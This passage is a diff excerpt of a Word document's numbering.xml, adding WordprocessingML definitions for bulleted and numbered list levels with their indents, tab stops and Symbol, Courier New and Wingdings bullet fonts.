+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="48147DBA"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="59F8FA30"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="48826219"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="23F60560"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="4BCA3A0D"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="BA143F50"/>
+    <w:lvl w:ilvl="0" w:tplc="0410000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04100019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0410001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0410000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04100019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0410001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0410000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04100019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0410001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="561B161F"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="9A64578A"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5ECB57B5"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="E3DAB198"/>
@@ -605,14 +3961,666 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
+  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="6267650E"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="1486BBBA"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="686A7968"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="AF642DA8"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
